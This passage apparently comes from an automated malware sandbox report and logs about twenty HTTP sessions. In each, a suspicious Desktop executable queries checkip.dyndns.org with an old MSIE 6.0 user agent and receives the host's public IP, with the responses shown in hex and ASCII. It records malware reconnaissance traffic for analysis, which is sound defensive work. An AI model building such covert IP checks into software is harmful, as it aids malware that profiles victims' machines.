                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.950007193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:57.046950102 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:57.694842100 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:57 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.950009193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:56:58.791788101 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:56:59.457020998 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:59 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.950011193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:00.418203115 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:01.092299938 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:00 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.950013193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:02.222388983 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:02.869720936 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:02 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.950015193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:03.862551928 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:04.492100000 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:04 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.950017193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:05.516987085 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:06.283077002 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:06 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        21192.168.2.950019193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:07.318825006 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:07.949659109 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:07 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.950021193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:09.162843943 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:09.795720100 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:09 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.950023193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:10.859555006 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:11.676215887 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:11 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        24192.168.2.950025193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:12.711165905 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:13.354516983 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:13 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        25192.168.2.950027193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:14.372728109 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:15.077299118 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:14 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        26192.168.2.950029193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:16.238293886 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:16.874577999 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:16 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        27192.168.2.950031193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:17.961086035 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:18.595966101 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:18 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        28192.168.2.950033193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:19.465866089 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:20.159671068 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:20 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        29192.168.2.950035193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:21.458517075 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:22.451500893 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:22 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        30192.168.2.950037193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:23.404653072 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:24.156219959 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:24 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        31192.168.2.950039193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:25.130359888 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:26.156943083 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:26 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        32192.168.2.950041193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:27.008522987 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:28.607250929 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:28 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        33192.168.2.950043193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:29.664640903 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:30.791426897 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:30 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        34192.168.2.950045193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:31.761778116 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:32.441133022 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:32 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
